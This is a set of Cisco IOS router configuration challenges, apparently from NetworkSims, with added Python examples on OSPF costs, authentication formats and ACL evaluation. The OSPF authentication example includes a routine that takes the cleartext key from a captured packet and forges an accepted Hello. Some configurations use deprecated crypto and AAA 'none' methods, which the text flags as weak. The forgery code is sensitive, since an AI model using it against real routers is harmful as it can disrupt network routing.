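The cost calculation behind Challenges 103 and 104, as an added worked example that is not part of the NetworkSims page. It applies the IOS rule (reference bandwidth divided by interface bandwidth, truncated, minimum 1) to the media in the tables above plus Gigabit and 10 Gigabit Ethernet, and shows which media become indistinguishable at each reference bandwidth. The media list and the two-hop comparison are constructed for the example.

```python
"""Added example, not part of the NetworkSims page: how IOS turns the
`bandwidth` of an interface into an OSPF cost, and why the reference bandwidth
from Challenge 104 has to be raised (consistently, on every router) once links
faster than 100 Mbps are in use."""

DEFAULT_REF_MBPS = 100          # IOS default `auto-cost reference-bandwidth`

# Interface bandwidths in kbps, the unit of the IOS `bandwidth` command
# (constructed table: the page's media plus two faster Ethernet types).
MEDIA_KBPS = {
    "56kbps serial connection": 56,
    "T1 link (1.544Mbps)": 1_544,
    "E1 link (2.048Mbps)": 2_048,
    "Ethernet (10Mbps)": 10_000,
    "Fast Ethernet (100Mbps)": 100_000,
    "4Mbps Token Ring": 4_000,
    "16Mbps Token Ring": 16_000,
    "Gigabit Ethernet": 1_000_000,
    "10 Gigabit Ethernet": 10_000_000,
}


def ospf_cost(bandwidth_kbps, reference_mbps=DEFAULT_REF_MBPS):
    """cost = reference bandwidth / interface bandwidth, truncated to an
    integer and never below 1 (the IOS behaviour; `ip ospf cost` overrides it)."""
    if bandwidth_kbps <= 0 or reference_mbps <= 0:
        raise ValueError("bandwidths must be positive")
    return max(1, (reference_mbps * 1_000_000) // (bandwidth_kbps * 1_000))


def cost_table(reference_mbps=DEFAULT_REF_MBPS):
    """Default cost of every medium for a given reference bandwidth (Mbps)."""
    return {name: ospf_cost(kbps, reference_mbps) for name, kbps in MEDIA_KBPS.items()}


def indistinguishable_media(reference_mbps=DEFAULT_REF_MBPS):
    """Groups of media that collapse to the same cost: OSPF cannot prefer one
    over the other, which is the problem the reference bandwidth solves."""
    by_cost = {}
    for name, cost in cost_table(reference_mbps).items():
        by_cost.setdefault(cost, []).append(name)
    return [sorted(names) for _, names in sorted(by_cost.items()) if len(names) > 1]


def path_cost(link_kbps_list, reference_mbps=DEFAULT_REF_MBPS):
    """OSPF adds the outgoing interface cost of every hop along a path."""
    return sum(ospf_cost(kbps, reference_mbps) for kbps in link_kbps_list)


if __name__ == "__main__":
    for ref in (100, 1_000, 10_000):
        print(f"auto-cost reference-bandwidth {ref}")
        for name, cost in cost_table(ref).items():
            print(f"  {name:28} {cost:>6}")
        print("  same cost:", indistinguishable_media(ref) or "none")
    # Two Gigabit hops against one Fast Ethernet hop: with the default
    # reference bandwidth the slower single hop wins (cost 1 vs 2).
    print(path_cost([1_000_000, 1_000_000]), path_cost([100_000]))
    print(path_cost([1_000_000, 1_000_000], 1_000), path_cost([100_000], 1_000))
```

Running it shows that with the default reference bandwidth a path over two Gigabit links (cost 2) loses to a single Fast Ethernet link (cost 1), and that `auto-cost reference-bandwidth 1000` fixes that but still leaves Gigabit and 10 Gigabit Ethernet at the same cost; 10000 separates all the media listed.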

Cisco Router Challenge 105


Outline
This challenge involves the configuration of OSPF authentication using a plain-text authentication key.
Objectives
The objectives of this challenge are to:

Define OSPF.
Define OSPF authentication key for S0 and S1.
Apply authentication to OSPF.

Example
# config t
(config)# int s0
(config-if)# ip ospf authentication-key test
(config-if)# exit
(config)# int s1
(config-if)# ip ospf authentication-key test
(config-if)# exit
(config)# router ospf 33
(config-router)# area 0 authentication

Cisco Router Challenge 106a


Outline
This challenge involves the configuration of OSPF authentication using an MD5 message-digest key.
Objectives
The objectives of this challenge are to:

Define OSPF.
Define OSPF authentication key for S0 and S1.
Apply authentication to OSPF.

Example
# config t
(config)# int s0
(config-if)# ip ospf message-digest-key 1 md5 0 default1
(config-if)# exit
(config)# int s1
(config-if)# ip ospf message-digest-key 1 md5 0 default1
(config-if)# exit
(config)# router ospf 33
(config-router)# area 0 authentication message-digest
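What the two authentication types in Challenges 105 and 106a actually put on the wire, as an added example that is not part of the NetworkSims page. It builds a real OSPFv2 header with a constructed Hello body and shows that the `authentication-key` form (AuType 1) sends the key in the clear and protects nothing, while the `message-digest-key` form (AuType 2, RFC 2328 Appendix D) sends only MD5 over the packet and the key plus a sequence number. The router IDs, keys and Hello contents are made up for the example; the zero-padding of keys shorter than 16 characters follows the IOS and Quagga implementations.

```python
"""Added example, not part of the NetworkSims page: plain-text (AuType 1)
versus MD5 (AuType 2) OSPF authentication on the wire, per RFC 2328 App. D.
Addresses, keys and Hello contents are constructed for the example."""
import hashlib
import hmac
import struct

AU_SIMPLE, AU_CRYPTO = 1, 2          # AuType values from RFC 2328
MD5_KEY_LEN = 16                     # IOS MD5 keys are <= 16 chars, NUL-padded


def ip_to_bytes(dotted):
    return bytes(int(o) for o in dotted.split("."))


def inet_checksum(data):
    """RFC 1071 ones'-complement checksum (used by AuType 0 and 1 only)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def hello_body(mask="255.255.255.0", hello=10, dead=40):
    """Constructed Hello body: mask, HelloInterval, Options, Rtr Pri,
    RouterDeadInterval, DR and BDR (both 0.0.0.0), no neighbours."""
    return ip_to_bytes(mask) + struct.pack("!HBBI", hello, 0x02, 1, dead) + bytes(8)


def header(body, router_id, area_id, au_type, checksum, auth_field):
    """24-byte OSPFv2 header: version 2, type 1 (Hello), length, router ID,
    area ID, checksum, AuType and the 8-byte Authentication field."""
    return (struct.pack("!BBH", 2, 1, 24 + len(body)) + ip_to_bytes(router_id)
            + ip_to_bytes(area_id) + struct.pack("!HH", checksum, au_type) + auth_field)


def build_simple_auth(body, router_id, area_id, key):
    """AuType 1 (`ip ospf authentication-key`): the password itself is the
    Authentication field, readable by anyone on the segment."""
    auth = key.encode().ljust(8, b"\x00")[:8]
    pkt = header(body, router_id, area_id, AU_SIMPLE, 0, auth) + body
    csum = inet_checksum(pkt[:16] + pkt[24:])     # checksum excludes the auth field
    return header(body, router_id, area_id, AU_SIMPLE, csum, auth) + body


def verify_simple_auth(packet, key):
    """A matching key and checksum is all AuType 1 checks: nothing secret
    covers the contents, so a captured key lets anyone forge packets."""
    length = struct.unpack("!H", packet[2:4])[0]
    pkt = packet[:length]
    csum, au_type = struct.unpack("!HH", pkt[12:16])
    if au_type != AU_SIMPLE or pkt[16:24] != key.encode().ljust(8, b"\x00")[:8]:
        return False
    return inet_checksum(pkt[:12] + b"\x00\x00" + pkt[14:16] + pkt[24:]) == csum


def forge_from_simple(captured, new_body):
    """Read the cleartext key out of a captured AuType 1 packet and use it to
    sign a different Hello (for example one with a tiny dead interval)."""
    key = captured[16:24].rstrip(b"\x00").decode()
    rid = ".".join(str(b) for b in captured[4:8])
    area = ".".join(str(b) for b in captured[8:12])
    return build_simple_auth(new_body, rid, area, key)


def _md5_digest(pkt, key):
    return hashlib.md5(pkt + key.encode().ljust(MD5_KEY_LEN, b"\x00")).digest()


def build_md5_auth(body, router_id, area_id, key_id, key, seq):
    """AuType 2 (`ip ospf message-digest-key <id> md5`): checksum 0, the auth
    field holds 0 / key-id / digest length / sequence number, and
    MD5(packet || key) is appended after the packet (not counted in length)."""
    auth = struct.pack("!HBBI", 0, key_id, MD5_KEY_LEN, seq)
    pkt = header(body, router_id, area_id, AU_CRYPTO, 0, auth) + body
    return pkt + _md5_digest(pkt, key)


def verify_md5_auth(packet, keys, last_seq):
    """`keys` maps key-id -> key like the per-interface message-digest-key
    entries. Returns (accepted, seq): a digest mismatch means tampering or a
    key mismatch; a sequence number below the last one seen is a replay."""
    length = struct.unpack("!H", packet[2:4])[0]
    pkt, digest = packet[:length], packet[length:length + MD5_KEY_LEN]
    au_type = struct.unpack("!H", pkt[14:16])[0]
    zero, key_id, auth_len, seq = struct.unpack("!HBBI", pkt[16:24])
    if au_type != AU_CRYPTO or zero or auth_len != MD5_KEY_LEN or key_id not in keys:
        return False, None
    if seq < last_seq:
        return False, None
    return hmac.compare_digest(_md5_digest(pkt, keys[key_id]), digest), seq


if __name__ == "__main__":
    body = hello_body()
    simple = build_simple_auth(body, "1.1.1.1", "0.0.0.0", "test")
    print("AuType 1 key visible:", b"test" in simple)
    print("forged Hello accepted:", verify_simple_auth(forge_from_simple(simple, hello_body(dead=1)), "test"))
    md5 = build_md5_auth(body, "1.1.1.1", "0.0.0.0", 1, "default1", 100)
    print("AuType 2 key visible:", b"default1" in md5)
    print("accepted:", verify_md5_auth(md5, {1: "default1"}, 0), "replayed:", verify_md5_auth(md5, {1: "default1"}, 101))
```

The plain-text form is therefore only a misconfiguration guard, not a security control. MD5 keeps the key off the wire and detects tampering, but MD5 itself is deprecated; where the IOS release supports it, prefer HMAC-SHA authentication through a key chain (`ip ospf authentication key-chain`).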

Cisco Router Challenge 106b


Outline
This challenge involves the configuration of OSPF with a stub area.
Objectives

The objectives of this challenge are to:

Setup S0 and S1.
Define OSPF with areas.
Define a stub area.

Example
# config t
(config)# router ospf 33
(config-router)# network 192.168.1.0 0.0.0.255 area 0
(config-router)# network 192.168.2.0 0.0.0.255 area 2
(config-router)# area 2 stub

Explanation
A stub area is one that carries no routes to destinations outside the OSPF autonomous
system: the ABR filters the external (Type 5) LSAs out of the area and advertises a default
route into it instead, so routers inside the area keep a smaller database and reach the
external AS through the ABR. Every router in the area must be configured with area 2 stub,
otherwise adjacencies will not form. In the case of:
(config)# router ospf 33
(config-router)# network 192.168.1.0 0.0.0.255 area 0
(config-router)# network 192.168.2.0 0.0.0.255 area 2
(config-router)# area 2 stub

area 2 is a stub area (as illustrated in Figure 1).

Figure 1: Stub area. The router connects area 0 (S0, towards the external autonomous
system) to the stub area 2 (S1).

Cisco Router Challenge 107


Outline
This challenge involves the configuration of OSPF with a totally stubby area.

Objectives
The objectives of this challenge are to:

Setup S0 and S1.
Define OSPF with areas.
Define a totally stubby area.

Example
# config t
(config)# router ospf 33
(config-router)# network 192.168.1.0 0.0.0.255 area 0
(config-router)# network 192.168.2.0 0.0.0.255 area 2
(config-router)# area 2 stub no-summary

Explanation
A totally stubby area goes one step beyond a stub area: besides the external (Type 5) LSAs,
the ABR also withholds the inter-area summary (Type 3) LSAs, so routers in the area see only
intra-area routes plus a single default route from the ABR. The no-summary keyword is a Cisco
extension and is needed only on the ABR; the other routers in the area are configured as a
plain stub area. In the case of:
(config)# router ospf 33
(config-router)# network 192.168.1.0 0.0.0.255 area 0
(config-router)# network 192.168.2.0 0.0.0.255 area 2
(config-router)# area 2 stub no-summary

area 2 is a totally stubby area (as illustrated in Figure 1).

Figure 1: Totally stubby area. The router connects area 0 (S0, towards the external
autonomous system) to area 2 (S1).

Cisco Router Challenge 108


Outline
This challenge involves the configuration of OSPF using an NSSA (not-so-stubby area): a stub area that may still contain an ASBR, whose external routes are carried as Type 7 LSAs inside the area and translated to Type 5 LSAs by the ABR.

Objectives
The objectives of this challenge are to:

Setup S0 and S1.
Define OSPF with areas.
Define NSSA.

Example
# config t
(config)# router ospf 33
(config-router)# network 192.168.1.0 0.0.0.255 area 0
(config-router)# network 192.168.2.0 0.0.0.255 area 2
(config-router)# area 2 nssa

Remote Access

Cisco Router Challenge 29


Outline
This challenge involves the configuration of a modem connection.

Objectives
The objectives of this challenge are to:

Setup line port.
Define transport protocols.
Define serial parameters.

Example
> en
# config t
Enter configuration commands, one per line. End with CNTL/Z.
(config)# line ?
  <0-10>   First Line number
  aux      Auxiliary line
  console  Primary terminal line
  tty      Terminal controller
  vty      Virtual terminal
(config)# line 3
(config-line)# transport ?
  input      Define which protocols to use when connecting to the terminal server
  output     Define which protocols to use for outgoing connections
  preferred  Specify the preferred protocol to use
(config-line)# transport input ?
  all     All protocols
  none    No protocols
  pad     X.3 PAD
  rlogin  Unix rlogin protocol
  telnet  TCP/IP Telnet protocol
(config-line)# transport input all
(config-line)# modem ?
  CTS-Alarm       Alarm device which only uses CTS for call control
  DTR-active      Leave DTR low unless line has an active incoming connection or EXEC
  Dialin          Configure line for a modern dial-in modem
  Host            Devices that expect an incoming modem call
  InOut           Configure line for incoming AND outgoing use of modem
  Printer         Devices that require DSR/CD active
  answer-timeout  Set interval between raising DTR and CTS response
  dtr-delay       Set interval during which DTR is held low
(config-line)# modem inout
(config-line)# login ?
  local   Local password checking
  tacacs  Use tacacs server for password checking
  <cr>
(config-line)# login local
(config-line)# speed ?
  <0-4294967295>  Transmit and receive speeds
(config-line)# speed 2400
(config-line)# rotary ?
  <0-100>  Rotary group to add line to
(config-line)# rotary 4
(config-line)# flow ?
  NONE      Set no flow control
  hardware  Set hardware flow control
  software  Set software flow control
(config-line)# flow none
(config-line)# autoselect ?
  arap          Set line to allow ARAP autoselection
  during-login  Do autoselect at the Username/Password prompt
  ppp           Set line to allow PPP autoselection
  slip          Set line to allow SLIP autoselection
  timeout       Set wait timeout for initial autoselect byte
  <cr>
(config-line)# autoselect ppp
(config-line)# stopbits 1.5
(config-line)# modem dialin

Explanation
A line has a single modem mode, so modem dialin at the end replaces the earlier modem inout
and leaves the line accepting incoming calls only. transport input all allows Telnet, rlogin
and PAD sessions on the line; limit it to the protocols actually needed. login local requires
username entries to exist on the router (prefer username ... secret so the passwords are
stored hashed rather than reversibly).

Cisco Router Challenge 30


Outline
This challenge involves the configuration of a console server.

Objectives
The objectives of this challenge are to:

Setup an Async interface.
Define encapsulation.
Define authentication.

Example

> en
# config t
(config)# int ?
  Async              Async interface
  BVI                Bridge-Group Virtual Interface
  CTunnel            CTunnel interface
  Dialer             Dialer interface
  FastEthernet       FastEthernet IEEE 802.3
  Group-Async        Async Group interface
  Loopback           Loopback interface
  MFR                Multilink Frame Relay bundle interface
  Multilink          Multilink-group interface
  Null               Null interface
  Serial             Serial
  Tunnel             Tunnel interface
  Vif                PGM Multicast Host interface
  Virtual            Virtual interface
  Virtual-Template   Virtual Template interface
  Virtual-TokenRing  Virtual TokenRing
  range              interface range command
(config)# int async ?
<1-65> Async interface number
(config)# int async 5
(config-if)# encapsulation ?
  atm-dxi      ATM-DXI encapsulation
  frame-relay  Frame Relay networks
  hdlc         Serial HDLC synchronous
  lapb         LAPB (X.25 Level 2)
  ppp          Point-to-Point protocol
  smds         Switched Megabit Data Service (SMDS)
  x25          X.25
(config-if)# encapsulation ppp
(config-if)# ppp authentication ?
  chap     Challenge Handshake Authentication Protocol (CHAP)
  ms-chap  Microsoft Challenge Handshake Authentication Protocol (MS-CHAP)
  pap      Password Authentication Protocol (PAP)
(config-if)# ppp authentication chap

Cisco Router Challenge 32


Outline
This challenge involves the configuration of a NAT.

Objectives
The objectives of this challenge are to:

Enable NAT on the inside and outside interfaces and define a static translation.

Example
> en
# config t
(config)# ip nat ?
  inside       Inside address translation
  outside      Outside address translation
  pool         Define pool of addresses
  service      Special translation for application using non-standard port
  translation  NAT translation entry configuration
(config)# ip nat inside ?
  destination  Destination address translation
  source       Source address translation
(config)# ip nat inside source ?
  list       Specify access list describing local addresses
  route-map  Specify route-map
  static     Specify static local->global mapping
(config)# ip nat inside source static ?
  A.B.C.D  Inside local IP address
  esp      IPSec-ESP (Tunnel mode) support
  network  Subnet translation
  tcp      Transmission Control Protocol
  udp      User Datagram Protocol
(config)# ip nat inside source static 193.84.250.1 ?
  A.B.C.D  Inside global IP address
(config)# ip nat inside source static 193.84.250.1 195.151.136.5
(config)# int e0
(config-if)# ip nat ?
  inside   Inside interface for address translation
  outside  Outside interface for address translation
(config-if)# ip nat inside
(config-if)# int s0
(config-if)# ip nat outside

Explanation
The static entry maps the inside local address 193.84.250.1 one-to-one to the inside global
address 195.151.136.5. Unlike dynamic NAT, a static mapping is bidirectional: any outside host
can open a connection to 195.151.136.5 and reach the inside host, so the outside interface
still needs an access list if that host is meant to accept only specific services. Translation
only takes place between an interface marked ip nat inside and one marked ip nat outside.

Cisco Router Challenge 37


Outline
This challenge involves the configuration of ISDN.

Objectives
The objectives of this challenge are to:

Define an ACL.
Implement a dialer-list.
Define ISDN parameters.

Example
> en
# config t
(config)# access-list 2 permit host 168.86.68.8
(config)# access-list 2 deny host 206.207.17.5
(config)# access-list 2 permit 99.22.1.0 0.0.255.255
(config)# dialer-list ?
  <1-10>  Dialer group number
(config)# dialer-list 39 ?
  protocol  Permit or Deny based on protocols
(config)# dialer-list 39 protocol ?
  appletalk         AppleTalk
  bridge            Bridging
  clns              OSI Connectionless Network Service
  clns_es           CLNS End System
  clns_is           CLNS Intermediate System
  decnet            DECnet
  decnet_node       DECnet node
  decnet_router-L1  DECnet router L1
  decnet_router-L2  DECnet router L2
  hpr               HPR
  ip                IP
  ipx               Novell IPX
  llc2              LLC2
  netbios           NETBIOS
  vines             Banyan Vines
  xns               XNS
(config)# dialer-list 39 protocol ip ?
  deny    Deny specified protocol
  list    Add access list to dialer list
  permit  Permit specified protocol
(config)# dialer-list 39 protocol ip permit
(config)# dialer-list 39 protocol ipx permit
(config)# dialer-list 39 protocol ip list ?
  <1-199>      IP access list
  <1300-2699>  IP expanded access list
(config)# dialer-list 39 protocol ip list 2
(config)# isdn ?
  T310cisco-action    Specify what action to take when T310cisco expires
  T310cisco-timeout   Specify ISDN VoIP timeout in milliseconds
  leased-line         Sets a BRI interface to support leased lines on B & D channels
  switch-type         Select the ISDN switch type
  tei-negotiation     Set when ISDN TEI negotiation should occur (global)
  voice-call-failure  Specify what cause code to emit when a voice call fails with no specific cause code
(config)# isdn switch-type ?
  basic-1tr6    1TR6 switch type for Germany
  basic-5ess    Lucent 5ESS switch type for the U.S.
  basic-dms100  Northern Telecom DMS-100 switch type for the U.S.
  basic-net3    NET3 switch type for UK, Europe, Asia and Australia
  basic-ni      National ISDN switch type for the U.S.
  basic-qsig    QSIG switch type
  basic-ts013   TS013 switch type for Australia (obsolete)
  ntt           NTT switch type for Japan
  vn3           VN3 and VN4 switch types for France
  <cr>
(config)# isdn switch-type basic-dms100
(config)# int bri0
(config-if)# isdn ?
  answer1              Specify Called Party number and subaddress
  answer2              Specify Called Party number and subaddress
  autodetect           Enable the automatic spid detection
  caller               Specify incoming telephone number to be verified
  calling-number       Specify Calling Number included for outgoing calls
  conference-code      Specify a Conference Code
  disconnect-cause     Specify cause code to return in call rejection to the switch
  fast-rollover-delay  Delay between fastrollover dials
  incoming-voice       Specify options for incoming calls.
  map                  Specify E.164 address to numbering plan/type mapping
  not-end-to-end       Specify speed when calls received are not isdn end to end
  outgoing-voice       Specify information transfer capability for voice calls
  overlap-receiving    Specify if the interface will do Overlap Receiving
  send-alerting        Specify if Alerting message to be sent out before Connect message
  sending-complete     Specify if Sending Complete included in outgoing SETUP message
  spid1                Specify Service Profile IDentifier
  spid2                Specify Service Profile IDentifier
  static-tei           Specify a Static TEI for ISDN BRI
(config-if)# isdn spid1 ?
WORD spid1 string
(config-if)# isdn spid1 512790203500
(config-if)# isdn spid2 532790203500
(config-if)# encapsulation ?
  atm-dxi      ATM-DXI encapsulation
  frame-relay  Frame Relay networks
  hdlc         Serial HDLC synchronous
  lapb         LAPB (X.25 Level 2)
  ppp          Point-to-Point protocol
  smds         Switched Megabit Data Service (SMDS)
  x25          X.25
(config-if)# encapsulation ppp
(config-if)# ppp ?
  authentication  Set PPP link authentication method
  bridge          Enable PPP bridge translation
  chap            Set CHAP authentication parameters
  ipcp            Set IPCP negotiation options
  lcp             PPP LCP configuration
  link            Set miscellaneous link parameters
  max-bad-auth    Allow multiple authentication failures
  multilink       Make interface multilink capable
  pap             Set PAP authentication parameters
  quality         Set minimum Link Quality before link is down
  reliable-link   Use LAPB with PPP to provide a reliable link
  timeout         Set PPP timeout parameters
  use-tacacs      Use TACACS to verify PPP authentications
(config-if)# ppp authentication chap
(config-if)# dialer ?
  callback-secure        Enable callback security
  enable-timeout         Set length of time an interface stays down before it is available for dialing
  fast-idle              Set idle time before disconnecting line with an unusually high level of contention
  hold-queue             Configure output hold queue
  idle-timeout           Specify idle timeout before disconnecting line
  load-threshold         Specify threshold for placing additional calls
  map                    Define multiple dial-on-demand numbers
  pool-member            Specify dialer pool membership
  priority               Specify priority for use in dialer group
  redial                 Configure redial for this interface
  rotary-group           Add to a dialer rotary group
  snapshot               Enable snapshot address for dialer profile
  string                 Specify telephone number to be passed to DCE device
  vpdn                   Enable vpdn dial
  wait-for-carrier-time  How long the router will wait for carrier
  watch-disable          Time to wait before bringing down watched route link
  watch-group            Assign interface to dialer-watch-list
(config-if)# dialer fast-idle 30
(config-if)# dialer-group 39

Cisco Router Challenge 21


Outline
This challenge involves the configuration of AAA on the device.
Objectives
The objectives of this challenge are to:

Define E0 settings.
Enable AAA.
Define AAA authentication.

Example
> en
# config t
(config)# aaa new-model
(config)# aaa authentication login default local
(config)# aaa authentication ppp default none
(config)# aaa authentication banner ^new york^
(config)# aaa authentication fail-message ^personal device^
(config)# aaa authorization network default none
(config)# aaa authorization exec default none

Explanation
aaa new-model switches the device to AAA method lists; the login list default checks the
local username database. The method none performs no authentication or authorization at
all, so the ppp, network and exec lists above let any PPP peer connect and any logged-in user
start an EXEC session without further checks. Use none only as a deliberate last-resort method
behind a TACACS+ or RADIUS method, never as the only entry in a list. The banner and
fail-message strings are delimited by a character that does not appear in the text (here ^).

Cisco Router Challenge 49


Outline
This challenge involves the configuration of a local AAA.

Objectives
The objectives of this challenge are to:

Setup AAA parameters for local users.

Example
> en
# config t
(config)# aaa new-model
(config)# aaa authorization commands 1 test local
(config)# aaa authorization network test local
(config)# aaa authentication login default local-case
(config)# line con 0
(config-line)# login authentication default
(config-line)# line aux 0
(config-line)# login authentication default
(config-line)# line vty 0 15
(config-line)# login authentication default
(config-line)# exit
(config)# username ben password fries
(config)# username ben password yellow

Explanation
local-case makes the username check case sensitive. A username is a single entry, so the
second username ben line replaces the first rather than adding a second password. The password
keyword stores the string in cleartext (or, with service password-encryption, as a trivially
reversible type 7 string); username ... secret stores a salted hash and should be preferred
for local accounts. The named authorization list test only takes effect once it is applied
to a line (authorization commands 1 test) or interface.

Cisco Router Challenge 50


Outline

NetworkSims.com

94

This challenge involves the configuration of AAA applied to an ISDN connection.

Objectives
The objectives of this challenge are to:

Setup local AAA.
Apply AAA onto an ISDN connection.

Example
> en
# config t
(config)# aaa new-model
(config)# aaa authorization commands 1 test local
(config)# aaa authorization network test local
(config)# aaa authentication ppp munich local
(config)# username ann password doghouse
(config)# username daniel password bravo
(config)# int bri0
(config-if)# encapsulation ppp
(config-if)# ppp authentication chap munich

Cisco Router Challenge 56


Outline
This challenge involves setting up a VPN.

Objectives
The objectives of this challenge are to:

Enable IPSec.
Define an IKE policy.
Define the encryption for IKE.
Define the authentication protocol for IKE.
Define the authentication type.
Define the Diffie-Hellman method.
For pre-share, define the identity.
For pre-share, define the key and the address.
For pre-share, define the transform set.

Example
> en
# config t
(config)# crypto isakmp enable
(config)# crypto isakmp policy 111
(config-isakmp)# encryption des
(config-isakmp)# hash sha
(config-isakmp)# authentication pre-share
(config-isakmp)# lifetime 10500
(config-isakmp)# group 1
(config-isakmp)# exit
(config)# crypto isakmp identity hostname
(config)# crypto isakmp key test address 192.168.1.1
(config)# crypto ipsec transform-set finland esp-des

Explanation
The ISAKMP (IKE phase 1) policy fixes the cipher (des), hash (sha), authentication method
(pre-share), Diffie-Hellman group (1, the 768-bit MODP group) and SA lifetime (10500 seconds).
The transform set finland selects the IPsec (phase 2) protection, here ESP with DES and no
integrity transform. Single DES, DH group 1 and ESP without an HMAC transform (for example
esp-sha-hmac) are all considered broken or inadequate today, and newer IOS releases reject or
warn about them; in production use AES (encryption aes 256), a SHA-2 hash, DH group 14 or
higher and an ESP transform that includes an HMAC. The pre-shared key test is bound to the
peer address 192.168.1.1 and must be identical on both peers.

Cisco Router Challenge 57


Outline
This challenge involves setting up a crypto map and applying it to an interface.

Objectives
The objectives of this challenge are to:

Define a crypto access-list, to identify the traffic to encrypt.
Define IKE.
Define a crypto map.
Bind the ACL with the crypto map.
Apply crypto map to E0.

Example
> en
# config t
(config)# hostname newhampshire
(config)# access-list 109 permit ip 50.93.142.0 0.0.255.255 136.163.130.0 0.0.255.255
(config)# crypto isakmp enable
(config)# crypto isakmp policy 111
(config-isakmp)# encryption des
(config-isakmp)# hash sha
(config-isakmp)# authentication pre-share
(config-isakmp)# lifetime 10500
(config-isakmp)# group 1
(config-isakmp)# exit
(config)# crypto isakmp identity hostname
(config)# crypto isakmp key test address 192.168.1.1
(config)# crypto ipsec transform-set finland esp-des
(config)# crypto map manchester 10 ipsec-isakmp
(config-crypto-map)# match address 109
(config-crypto-map)# set peer 192.168.1.1
(config-crypto-map)# set transform-set finland
(config-crypto-map)# set pfs group1
(config-crypto-map)# exit
(config)# int e0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# no shut
(config-if)# crypto map manchester

Explanation
The crypto ACL 109 selects the traffic to protect (the crypto map's match address), the
transform set gives the protection, and set pfs group1 forces a fresh Diffie-Hellman exchange
for every phase 2 SA. set peer and crypto isakmp key must name the remote endpoint: in this
example they carry 192.168.1.1, the same address that is then given to the local E0
interface, so the peer address would have to be the other router's address before a tunnel
could be negotiated. The wildcard masks in ACL 109 (0.0.255.255) ignore the third octet, so
the entry covers 50.93.0.0/16 to 136.163.0.0/16 rather than the /24 networks the addresses
suggest.

Cisco Router Challenge 58


Outline
This challenge involves setting an access-list to allow IPSec.

Objectives
The objectives of this challenge are to:

Create an access-list which allows AHP, ESP and ISAKMP.
Apply the access-list.

Example
> en
# config t
(config)# hostname london

london (config)# access-list 101 permit ahp host 117.84.81.2 host 61.222.47.2
london (config)# access-list 101 permit esp host 117.84.81.2 host 61.222.47.2
london (config)# access-list 101 permit udp host 117.84.81.2 host 61.222.47.2 eq isakmp
london (config)# int e0
london (config-if)# ip address 136.22.25.1 255.252.0.0
london (config-if)# no shut
london (config-if)# ip access-group 101 in

Explanation
The three entries admit AH (IP protocol 51), ESP (IP protocol 50) and IKE (UDP port 500)
from the peer 117.84.81.2 to 61.222.47.2; the implicit deny at the end of the list drops every
other inbound packet on E0, so anything else the interface must accept (routing protocol
traffic, management) needs its own permit entry.
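An evaluator for the numbered access lists used in the dialer-list (Challenge 37), crypto map (Challenge 57) and IPsec (Challenge 58) examples, as an added example that is not part of the NetworkSims page. It parses the `access-list` lines as typed, applies first-match semantics with the implicit deny, and checks concrete packets: it shows that the IPsec list above admits AH, ESP and IKE on UDP 500 from the peer but not NAT-T on UDP 4500, and that a subnet mask typed where a wildcard belongs (a mistake the queue-list ACL in Challenge 66 invites) matches the wrong hosts. The sample packets are constructed; only the `host`, `any`, wildcard and `eq` operators that occur on this page are handled, and the protocol and port names are a small constructed subset of the IOS keywords.

```python
"""Added example, not part of the NetworkSims page: an evaluator for the
numbered IOS access lists in Challenges 37, 57 and 58, with the implicit deny.
Sample packets are constructed; only host/any/wildcard/eq are supported."""
import ipaddress
from dataclasses import dataclass
from typing import Optional

PROTO_NUM = {"ip": None, "icmp": 1, "tcp": 6, "udp": 17, "gre": 47, "esp": 50, "ahp": 51}
PORT_NAME = {"isakmp": 500, "non500-isakmp": 4500, "smtp": 25, "telnet": 23,
             "www": 80, "domain": 53, "bgp": 179}   # constructed subset of IOS names


def _ip(dotted):
    return int(ipaddress.IPv4Address(dotted))


def _addr_spec(tok, i):
    """`any` | `host A.B.C.D` | `A.B.C.D wildcard` -> (network, wildcard, next index)."""
    if tok[i] == "any":
        return 0, 0xFFFFFFFF, i + 1
    if tok[i] == "host":
        return _ip(tok[i + 1]), 0, i + 2
    return _ip(tok[i]), _ip(tok[i + 1]), i + 2


def _port_spec(tok, i):
    """Only the `eq <port>` operator (the one used on this page)."""
    if i < len(tok) and tok[i] == "eq":
        p = tok[i + 1]
        return (int(p) if p.isdigit() else PORT_NAME[p]), i + 2
    return None, i


@dataclass
class Ace:
    permit: bool
    proto: Optional[int]        # None matches every IP protocol
    src: int
    src_wc: int
    dst: int
    dst_wc: int
    sport: Optional[int] = None
    dport: Optional[int] = None

    @staticmethod
    def _in(addr, net, wc):
        # A wildcard bit of 1 means "don't care"; a 0 bit must match exactly.
        return ((addr & ~wc) & 0xFFFFFFFF) == ((net & ~wc) & 0xFFFFFFFF)

    def matches(self, proto, src, dst, sport, dport):
        return ((self.proto is None or self.proto == proto)
                and self._in(src, self.src, self.src_wc)
                and self._in(dst, self.dst, self.dst_wc)
                and (self.sport is None or self.sport == sport)
                and (self.dport is None or self.dport == dport))


def parse_acl(config):
    """Return {number: [Ace, ...]} from `access-list` lines, in order."""
    acls = {}
    for line in config.splitlines():
        t = line.split()
        if len(t) < 4 or t[0] != "access-list":
            continue                    # e.g. a bare `access-list 2`: incomplete command
        number, permit = int(t[1]), t[2] == "permit"
        if number <= 99 or 1300 <= number <= 1999:          # standard: source only
            src, wc, _ = _addr_spec(t, 3)
            ace = Ace(permit, None, src, wc, 0, 0xFFFFFFFF)
        else:                                               # extended
            src, swc, i = _addr_spec(t, 4)
            sport, i = _port_spec(t, i)
            dst, dwc, i = _addr_spec(t, i)
            dport, i = _port_spec(t, i)
            ace = Ace(permit, PROTO_NUM[t[3]], src, swc, dst, dwc, sport, dport)
        acls.setdefault(number, []).append(ace)
    return acls


def evaluate(acl, proto, src, dst, sport=None, dport=None):
    """First matching entry decides; no match is the implicit deny."""
    s, d = _ip(src), _ip(dst)
    for ace in acl:
        if ace.matches(proto, s, d, sport, dport):
            return ace.permit
    return False


# The access lists as typed in Challenges 37, 57 and 58.
PAGE_ACLS = parse_acl("""
access-list 2 permit host 168.86.68.8
access-list 2 deny host 206.207.17.5
access-list 2 permit 99.22.1.0 0.0.255.255
access-list 109 permit ip 50.93.142.0 0.0.255.255 136.163.130.0 0.0.255.255
access-list 101 permit ahp host 117.84.81.2 host 61.222.47.2
access-list 101 permit esp host 117.84.81.2 host 61.222.47.2
access-list 101 permit udp host 117.84.81.2 host 61.222.47.2 eq isakmp
""")

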